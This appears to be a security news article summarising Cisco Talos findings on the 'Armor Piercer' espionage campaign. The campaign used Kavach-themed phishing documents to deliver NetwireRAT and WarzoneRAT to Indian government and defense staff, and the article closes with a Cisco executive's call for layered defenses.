Cyberattacks and malicious campaigns are becoming rampant, with new cybercriminal operations being reported more often in the security landscape. Recently, security experts from Cisco Talos uncovered a cyber espionage campaign, tracked as Armor Piercer, targeting employees in the government and defense sector in India with two Remote Access Trojans – NetwireRAT (also known as NetwireRC) and WarzoneRAT (also known as Ave Maria). The campaign was found to be distributing malicious documents to deploy RATs and access confidential data.
NetwireRAT and WarzoneRAT are packed with a variety of capabilities, including:
- Stealing credentials from browsers
- Execute arbitrary commands
- Gather system information
- File management operations such as write, read, copy, delete files, etc.
- Enumerate, terminate processes
- Remote desktop
- Webcam capture
- Credential stealing from browsers and email clients
- Reverse shells
Armor Piercer’s Phishing Campaign
Active since 2020, the campaign leverages operational documents related to Kavach as phishing lures to trick employees. Kavach is a two-factor authentication (2FA) app operated by India’s National Informatics Centre (NIC), used by government personnel in various departments to access their emails. Armor Piercer was also found using compromised websites and fake domains to host their malware payloads. It also used multiple phishing techniques to obfuscate itself and evade security detections.
Armor Piercer Attack Vector
Armor Piercer operators delivered their malware payloads via various phishing lures to the targeted employees posed as security advisories or guides in the form of malicious Microsoft Office documents (maldocs) and archives (RARs, ZIPs). Once a victim downloads the maldoc, it automatically downloads a loader responsible for deploying the final RAT payload on the targeted endpoint.
“Apart from artifacts involved in the infection chains, we’ve also discovered the use of server-side scripts to carry out operational tasks such as sending out malicious emails and maintaining a presence on compromised sites via web shells. This provides additional insight into the attacker’s operational TTPs. Some of these lures and tactics utilized by the attackers bear a strong resemblance to the Transparent Tribe and SideCopy APT groups, including the use of compromised websites and fake domains,” the researchers said.
Commenting on the Armor Piercer cyber operation, Vishak Raman, Director, Security Business, Cisco India and SAARC, said, “Operation Armor Piercer is a grim reminder of the vulnerabilities still existing in our cybersecurity posture. To ensure end-to-end security of India’s most precious assets and information, government and defense agencies must implement a layered defense strategy that enables comprehensive visibility and coverage across all endpoints, accelerates response by leveraging automation and orchestration to enrich data, and reduces massive data sets into actionable insights through AI/ML and data analytics. Essentially, security must not be bolted on, rather built into every system and process to ensure infallible protection of people and assets.”